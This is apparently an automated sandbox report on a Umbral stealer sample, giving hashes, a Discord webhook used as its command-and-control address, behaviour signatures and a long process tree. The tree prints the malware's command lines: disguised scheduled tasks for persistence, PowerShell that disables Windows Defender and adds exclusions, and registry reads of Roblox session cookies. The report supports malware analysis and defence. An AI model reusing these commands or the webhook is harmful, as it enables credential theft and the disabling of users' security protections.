Analysis

  • max time kernel
    150s
  • max time network
    142s
  • platform
    windows7_x64
  • resource
    win7-20240611-en
  • resource tags

    arch:x64arch:x86image:win7-20240611-enlocale:en-usos:windows7-x64system
  • submitted
    18-06-2024 10:28

General

  • Target

    SolaroB.exe

  • Size

    315KB

  • MD5

    ded6899acd90f3b7a2a65ac7adf41c9f

  • SHA1

    1d696bcfcc10fa05d7a69ce7782ebd0006efb367

  • SHA256

    a3b28c9c105887943acef8ae6e70bb79a3db83a7bcdd4307bde10e72c3394268

  • SHA512

    fb7986ec47d65412bdda2e25b6b77866bc5dac8d8c51756ba5129e09f5ceb39b4ffc2c4c76536c20ff7dcc23f150f2dde4ba80f08681e53e8e3867b2dda5ab15

  • SSDEEP

    6144:gtYtxQIeHKPxA20MTbe61lWTLF21cUWF0ryP7iynfap2d3zN9BeOaJs/C2vQG1yt:gtYt7poMPP1le0y+y7iynypQxb5aJ2+

Malware Config

Extracted

Family

umbral

C2

https://discord.com/api/webhooks/1251956998581522512/T_EEim3SFywd5SuJ1qG-aBAF2rWGOQN6KOZXRn7DecpgpODfH2Pr1ZycNH_TsE54WBy6

Signatures

  • Detect Umbral payload 2 IoCs
  • Modifies WinLogon for persistence 2 TTPs 1 IoCs
  • Umbral

    Umbral stealer is an opensource moduler stealer written in C#.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

  • Drops file in Drivers directory 1 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Executes dropped EXE 3 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in Program Files directory 2 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Detects videocard installed 1 TTPs 1 IoCs

    Uses WMIC.exe to determine videocard installed.

  • Runs ping.exe 1 TTPs 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 42 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Views/modifies file attributes 1 TTPs 1 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\SolaroB.exe
    "C:\Users\Admin\AppData\Local\Temp\SolaroB.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1952
    • C:\Users\Admin\AppData\Local\Temp\SolaraB.exe
      "C:\Users\Admin\AppData\Local\Temp\SolaraB.exe"
      2⤵
      • Modifies WinLogon for persistence
      • Executes dropped EXE
      • Adds Run key to start application
      • Drops file in Program Files directory
      • Drops file in Windows directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2324
      • C:\Windows\system32\CMD.exe
        "CMD" /C SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2372
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /CrEAte /F /sc OnLoGoN /rl HighEst /tn "OpenOffice" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe"
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:2392
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:2448
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:888
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of WriteProcessMemory
        PID:1956
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo 5 /tn "Spybot - Search & Destroy" /tr "C:\Program Files\xdwdSkype.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2264
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2872
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2928
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1596
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2956
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2144
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:708
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1792
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1560
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:3036
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2272
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1052
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2524
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1296
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1104
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:784
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1812
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2448
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1612
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2736
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2744
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2700
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2440
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1896
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1684
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2208
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2776
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2824
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1204
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1472
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2060
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:408
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2464
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1712
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2240
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2244
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1612
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2928
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2184
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1996
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2800
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:1076
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:1256
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2780
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          • Suspicious behavior: EnumeratesProcesses
          PID:2080
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        PID:2276
        • C:\Windows\system32\schtasks.exe
          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
          4⤵
          • Scheduled Task/Job: Scheduled Task
          PID:1204
      • C:\Windows\system32\CMD.exe
        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
        3⤵
          PID:1308
          • C:\Windows\system32\schtasks.exe
            SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
            4⤵
            • Scheduled Task/Job: Scheduled Task
            PID:1484
        • C:\Windows\system32\CMD.exe
          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
          3⤵
            PID:2832
            • C:\Windows\system32\schtasks.exe
              SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
              4⤵
              • Scheduled Task/Job: Scheduled Task
              PID:1636
          • C:\Windows\system32\CMD.exe
            "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
            3⤵
              PID:1240
              • C:\Windows\system32\schtasks.exe
                SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                4⤵
                • Scheduled Task/Job: Scheduled Task
                PID:1128
            • C:\Windows\system32\CMD.exe
              "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
              3⤵
                PID:2304
                • C:\Windows\system32\schtasks.exe
                  SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                  4⤵
                  • Scheduled Task/Job: Scheduled Task
                  PID:1520
              • C:\Windows\system32\CMD.exe
                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                3⤵
                  PID:1776
                  • C:\Windows\system32\schtasks.exe
                    SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                    4⤵
                    • Scheduled Task/Job: Scheduled Task
                    PID:2312
                • C:\Windows\system32\CMD.exe
                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                  3⤵
                    PID:876
                    • C:\Windows\system32\schtasks.exe
                      SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                      4⤵
                      • Scheduled Task/Job: Scheduled Task
                      PID:2960
                  • C:\Windows\system32\CMD.exe
                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                    3⤵
                      PID:2652
                      • C:\Windows\system32\schtasks.exe
                        SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                        4⤵
                        • Scheduled Task/Job: Scheduled Task
                        PID:2432
                    • C:\Windows\system32\CMD.exe
                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                      3⤵
                        PID:2816
                        • C:\Windows\system32\schtasks.exe
                          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                          4⤵
                          • Scheduled Task/Job: Scheduled Task
                          PID:1896
                      • C:\Windows\system32\CMD.exe
                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                        3⤵
                          PID:1540
                          • C:\Windows\system32\schtasks.exe
                            SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                            4⤵
                            • Scheduled Task/Job: Scheduled Task
                            PID:1768
                        • C:\Windows\system32\CMD.exe
                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                          3⤵
                            PID:2772
                            • C:\Windows\system32\schtasks.exe
                              SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                              4⤵
                              • Scheduled Task/Job: Scheduled Task
                              PID:108
                          • C:\Windows\System32\cmd.exe
                            "C:\Windows\System32\cmd.exe" /c start /b powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"' & exit
                            3⤵
                              PID:2784
                              • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                powershell –ExecutionPolicy Bypass Start-Process -FilePath '"C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"'
                                4⤵
                                • Command and Scripting Interpreter: PowerShell
                                PID:592
                                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe
                                  "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Templates\y5nxxdhf.5gc.exe"
                                  5⤵
                                  • Executes dropped EXE
                                  PID:3056
                                  • C:\Windows\system32\WerFault.exe
                                    C:\Windows\system32\WerFault.exe -u -p 3056 -s 608
                                    6⤵
                                      PID:1636
                              • C:\Windows\system32\CMD.exe
                                "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                3⤵
                                  PID:1716
                                  • C:\Windows\system32\schtasks.exe
                                    SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                    4⤵
                                    • Scheduled Task/Job: Scheduled Task
                                    PID:664
                                • C:\Windows\system32\CMD.exe
                                  "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                  3⤵
                                    PID:2792
                                    • C:\Windows\system32\schtasks.exe
                                      SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                      4⤵
                                      • Scheduled Task/Job: Scheduled Task
                                      PID:784
                                  • C:\Windows\system32\CMD.exe
                                    "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                    3⤵
                                      PID:2220
                                      • C:\Windows\system32\schtasks.exe
                                        SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                        4⤵
                                        • Scheduled Task/Job: Scheduled Task
                                        PID:2660
                                    • C:\Windows\system32\CMD.exe
                                      "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                      3⤵
                                        PID:1956
                                        • C:\Windows\system32\schtasks.exe
                                          SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                          4⤵
                                          • Scheduled Task/Job: Scheduled Task
                                          PID:2628
                                      • C:\Windows\system32\CMD.exe
                                        "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                        3⤵
                                          PID:2360
                                          • C:\Windows\system32\schtasks.exe
                                            SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                            4⤵
                                            • Scheduled Task/Job: Scheduled Task
                                            PID:2800
                                        • C:\Windows\system32\CMD.exe
                                          "CMD" /c SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST & exit
                                          3⤵
                                            PID:1908
                                            • C:\Windows\system32\schtasks.exe
                                              SchTaSKs /create /f /sc minute /mo -1 /tn "Sage 50 Update" /tr "C:\Users\Admin\Documents\xdwdDiscord.exe" /RL HIGHEST
                                              4⤵
                                              • Scheduled Task/Job: Scheduled Task
                                              PID:2468
                                        • C:\Users\Admin\AppData\Local\Temp\Umbral.exe
                                          "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                          2⤵
                                          • Drops file in Drivers directory
                                          • Executes dropped EXE
                                          • Suspicious behavior: EnumeratesProcesses
                                          • Suspicious use of AdjustPrivilegeToken
                                          • Suspicious use of WriteProcessMemory
                                          PID:2988
                                          • C:\Windows\System32\Wbem\wmic.exe
                                            "wmic.exe" csproduct get uuid
                                            3⤵
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2064
                                          • C:\Windows\system32\attrib.exe
                                            "attrib.exe" +h +s "C:\Users\Admin\AppData\Local\Temp\Umbral.exe"
                                            3⤵
                                            • Views/modifies file attributes
                                            PID:2596
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp\Umbral.exe'
                                            3⤵
                                            • Command and Scripting Interpreter: PowerShell
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2656
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
                                            3⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2992
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            3⤵
                                            • Suspicious behavior: EnumeratesProcesses
                                            • Suspicious use of AdjustPrivilegeToken
                                            PID:2784
                                          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                            "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
                                            3⤵
